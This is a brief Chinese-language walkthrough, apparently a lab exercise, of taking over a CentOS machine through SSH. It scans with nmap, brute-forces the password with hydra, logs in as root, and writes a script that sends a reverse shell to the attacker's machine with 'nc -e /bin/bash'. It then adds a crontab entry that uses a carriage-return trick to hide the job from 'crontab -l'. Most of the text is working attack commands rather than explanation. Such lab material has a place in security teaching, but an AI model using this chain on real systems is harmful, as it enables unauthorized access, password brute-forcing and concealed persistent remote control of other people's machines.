赞
踩
攻击机(192.168.83.136)
靶机(192.168.83.140)
靶机打开22端口服务
centos7开启ssh 22端口_centos7开放22端口-CSDN博客
看这个师傅的操作
此实验对ssh端口漏洞利用的最基础实验
发现22端口打开,尝试爆破
nmap -Pn 192.168.83.140
hydra爆破
hydra -L user.txt -P password.txt ssh://192.168.83.140
字典去github上面找
字典爆破出密码
得到账号密码root root
ssh root@192.168.83.140
用户名 登录 在主机
登录成功了
cd /tmp
vim task.sh创建文件
进入/tmp 创建task.sh文件
内容
#!/bin/bash
nc 192.168.83.136 8888 -e /bin/bash
反弹shell到攻击机
这里的ip是攻击机器的
添加文件执行的权限
chmod +x task.sh
查看权限
ls -l task
create_task.sh
(crontab -l;printf "* * * * * /tmp/task.sh;\rno crontw-wab for `whoami` %100c\n") | crontab -
开启另外一个终端
nc -lvp 8888
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。